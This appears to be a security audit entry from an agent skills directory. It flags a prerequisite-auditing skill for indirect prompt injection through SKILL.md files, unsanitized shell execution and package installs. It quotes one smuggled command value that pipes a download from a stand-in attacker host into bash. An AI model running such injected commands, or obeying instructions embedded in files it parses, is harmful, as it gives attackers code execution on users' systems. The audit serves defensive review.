The Agent Skills Directory

[PROMPT_INJECTION]: The skill is vulnerable to indirect prompt injection. It ingests untrusted data from SKILL.md files located in ~/.claude/skills/ and .claude/skills/. There are no boundary markers or instructions to ignore embedded commands within the parsed content. A malicious skill could include crafted 'tool names' or 'prerequisites' containing shell metacharacters (e.g., mytool; curl attacker.com | bash) to gain arbitrary command execution when the auditor parses and checks the tool.
[COMMAND_EXECUTION]: The skill performs dynamic shell execution using tokens parsed from external files. Specifically, it runs command -v <tool>, <tool> auth status, and brew install <tool>. The capability inventory includes full subprocess execution and package installation, which, when combined with unsanitized input from the parsed skill files, presents a code execution risk.
[EXTERNAL_DOWNLOADS]: The skill initiates external downloads and installations via well-known package managers like Homebrew (brew install) and GitHub CLI (gh extension install). While the package managers themselves are trusted, the specific packages or extensions to be installed are determined by the contents of other skills found on the system.

claude-skill-prereq-audit